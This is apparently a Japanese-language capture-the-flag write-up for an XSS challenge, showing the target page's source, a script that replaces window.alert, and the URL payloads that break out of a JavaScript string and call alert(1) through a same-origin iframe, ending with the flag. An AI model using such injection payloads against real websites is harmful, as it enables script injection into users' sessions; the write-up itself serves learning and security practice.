問題文

This is some kind of reverse captcha to tell if the visitor is indeed a robot. Can you complete it?
http://xss1.alieni.se:2999/

writeup

この画面上でalert(1)を表示するURLを作って、フォームに入力してsubmitすると勝ち。
つまり、この画面にはXSSの脆弱性が存在する。

hereのリンクを押下すると、http://xss1.alieni.se:2999/?xss=hello へ遷移する。 HTMLソースを見てみる。

<!DOCTYPE html>
<html lang="en">
  <head>
      <meta charset="UTF-8">
      <meta name="viewport" user-scalable="no" content="width=device-width, initial-scale=1">
      <link rel="stylesheet" href="/static/style.css" />
      <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
      <link rel="stylesheet" href="https://netdna.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css" />
      <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/mdbootstrap/4.3.0/css/mdb.min.css" />
  </head>
  <body>
      <script src="/static/no_alert_for_you.js"></script><section class="login-info">
<div class="container">
  <script>var x ='hello'; var y = `hello`; var z = "hello";</script>
  <div class="row main">
       <div class="form-header header">
          <h1 class="text-center ">Excess Ess</h1>
        </div>
    <div class="main-content">
          <div class="row" id="container">
            <hr>
            <h4 class="text-center black-text">Make alert(1) pop <a href="/?xss=hello">here</a> and submit the working URL in the form below.</h4>
          </div>
          <form method="post" action="/submit">
          <div class="input-group ">
            <span class="input-group-addon"><span class="glyphicon glyphicon-paperclip" aria-hidden="true"></span></span>
            <input type="text" class="form-control text-center" name="url" placeholder="URL that pops alert(1) without user interaction">
          </div>
          
          <div class="form-group ">
          <center>
              <input type="submit" value="submit" name="login" class="btn btn-green header btn-lg btn-block login-button"/>
              </center>
          </div>

          </form>
          
          <div class="form-group" id="container">
          </div>
      
      </div>
    </div></body></html>

<script>var x ='hello'; var y = `hello`; var z = "hello";</script>がポイント。
xssパラメータの文字列がここにセットされるようだ。
なお、<と>を入力しても削除される。

他、/static/no_alert_for_you.jsをロードしている。
中身を見てみる。

/*

        If there is no alert,
            how can there be XSS?
                      /
                     /
            )            (
           /(   (\___/)  )\
          ( #)  \ ('')| ( #
           ||___c\  > '__||
           ||**** ),_/ **'|
     .__   |'* ___| |___*'|
      \_\  |' (    ~   ,)'|
       ((  |' /(.  '  .)\ |
        \\_|_/ <_ _____> \______________
         /   '-, \   / ,-'      ______  \
b'ger   /      (//   \\)     __/     /   \
                            './_____/

*/
window.alert = (x=>prompt("He confirm. He alert. But most of all he prompt."));

alert関数を上書きしているため、alert関数を呼んでもプロンプトが表示されてしまう。
一応、試してみる。
http://xss1.alieni.se:2999/?xss=';alert(1);var a='にアクセスする。

やはりプロンプトが表示される。

HTMLソースはこうなる。

(snip)
  <script>var x ='';alert(1);var a=''; var y = `';alert(1);var a='`; var z = "';alert(1);var a='";</script>
(snip)

上書きされているのは現在のwindowオブジェクトのalert関数である。
windowオブジェクトはフレームごとに異なるため、
iframeでインラインフレームを作って、インラインフレームのwindowオブジェクトのalert関数を使えばよい。

以下、JavaScriptでインラインフレームを作ってからalert関数を呼ぶスクリプトを混入させるURL。
わかりやすいように改行を入れた。

http://xss1.alieni.se:2999/?xss=
';
var iframe = document.createElement('iframe');
document.body.appendChild(iframe);
iframe.contentWindow.alert(1);
var a='

すると、

Not allowed to navigate outside of xss1.alieni.se:2999

が表示された。
iframeのsrcが空だと、外部サイト扱いになるのだろうか。 srcにルートをセット。

http://xss1.alieni.se:2999/?xss=
';
var iframe = document.createElement('iframe');
iframe.src = '/';
document.body.appendChild(iframe);
iframe.contentWindow.alert(1);
var a='

アクセスすると、アラートが表示された。

そのまま、URLを入力フォームに入力してsubmit。

フラグゲット 。
sctf{cr0ss_s1te_n0scr1ptinG}